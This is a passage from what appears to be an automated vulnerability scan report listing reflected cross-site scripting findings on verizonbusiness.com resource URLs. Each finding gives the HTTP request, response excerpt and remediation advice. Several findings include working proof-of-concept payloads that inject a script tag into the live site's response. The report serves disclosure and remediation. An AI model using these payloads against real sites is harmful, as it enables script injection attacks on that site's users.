This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/29f77'%3be4bcc915404 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/29f77';e4bcc915404'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.729. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc83"%3bded5cf3ccaf was submitted in the REST URL parameter 1. This input was echoed as 8dc83";ded5cf3ccaf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8dc83"%3bded5cf3ccaf/1002a3a4-111-Executive+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:38 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8dc83";ded5cf3ccaf/1002a3a4-111-Executive+Briefs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.730. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e9e5'%3b10c5f26ad12 was submitted in the REST URL parameter 1. This input was echoed as 8e9e5';10c5f26ad12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8e9e5'%3b10c5f26ad12/1002a3a4-111-Executive+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:55 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources8e9e5';10c5f26ad12/1002a3a4-111-Executive+Briefs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.731. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e67e3'%3bcdf496f0cea was submitted in the REST URL parameter 2. This input was echoed as e67e3';cdf496f0cea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e67e3'%3bcdf496f0cea HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/e67e3';cdf496f0cea'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.732. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaa6e</script><script>alert(1)</script>ae6da508b0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a4-111-Executive+Briefs.xmlaaa6e</script><script>alert(1)</script>ae6da508b0b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "c452e0394993e8113eafeb875c7fff64"
Last-Modified: Wed, 17 Nov 2010 00:30:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33497
Date: Wed, 17 Nov 2010 00:30:11 GMT
Connection: close
Set-Cookie: BERT=VRID%3db8cf5e7b-b8ba-4a83-bbe9-bd884dfd0ec1|VTID%3dc983dfc5-13b9-45a1-b16f-dd2f91d81cd1|SX%3d1289955011|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:55 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a4-111-Executive+Briefs.xmlaaa6e</script><script>alert(1)</script>ae6da508b0b</url>
...[SNIP]...

1.733. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ded"%3be8d70d2e7ba was submitted in the REST URL parameter 1. This input was echoed as 34ded";e8d70d2e7ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources34ded"%3be8d70d2e7ba/1002a3a5-111-Fact+Sheets+&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:32 GMT
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources34ded";e8d70d2e7ba/1002a3a5-111-Fact+Sheets+&+Brochures.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.734. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e11'%3bdc98a22fd76 was submitted in the REST URL parameter 1. This input was echoed as b8e11';dc98a22fd76 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb8e11'%3bdc98a22fd76/1002a3a5-111-Fact+Sheets+&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesb8e11';dc98a22fd76/1002a3a5-111-Fact+Sheets+&+Brochures.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.735. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7e89'%3bcd643907fdb was submitted in the REST URL parameter 2. This input was echoed as b7e89';cd643907fdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b7e89'%3bcd643907fdb&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:37 GMT
Content-Type: text/html
Content-Length: 40242
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b7e89';cd643907fdb&+Brochures.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.736. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc6b</script><script>alert(1)</script>a8779df6914 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a5-111-Fact+Sheets+2bc6b</script><script>alert(1)</script>a8779df6914&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Last-Modified: Wed, 17 Nov 2010 00:29:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:35 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:29:34 GMT
Content-Length: 104797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a3a5-111-Fact+Sheets+2bc6b</script><script>alert(1)</script>a8779df6914&+Brochures.xml</url>
...[SNIP]...

1.737. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4038d'%3b80661984162 was submitted in the REST URL parameter 1. This input was echoed as 4038d';80661984162 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4038d'%3b80661984162/1002a3a6-111-Podcasts.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:29:33 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources4038d';80661984162/1002a3a6-111-Podcasts.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.738. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216e1"%3bc1b2f840f17 was submitted in the REST URL parameter 1. This input was echoed as 216e1";c1b2f840f17 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources216e1"%3bc1b2f840f17/1002a3a6-111-Podcasts.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:07 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources216e1";c1b2f840f17/1002a3a6-111-Podcasts.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.739. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15e06</script><script>alert(1)</script>653b9eba038 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a6-111-Podcasts.xml15e06</script><script>alert(1)</script>653b9eba038 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Last-Modified: Wed, 17 Nov 2010 00:30:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d896a3299-d8b6-4dfd-8ed4-6ac2ccd31b2d|VTID%3d33d6ced7-9731-437f-8f5a-b8fbe4148d2d|SX%3d1289955059|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:43 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:59 GMT
Content-Length: 247986

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a6-111-Podcasts.xml15e06</script><script>alert(1)</script>653b9eba038</url>
...[SNIP]...

1.740. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2111'%3b50715cbb080 was submitted in the REST URL parameter 2. This input was echoed as c2111';50715cbb080 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c2111'%3b50715cbb080 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:31:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:31:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/c2111';50715cbb080'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.741. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad609"%3bb9494151c4e was submitted in the REST URL parameter 1. This input was echoed as ad609";b9494151c4e in the application's response.

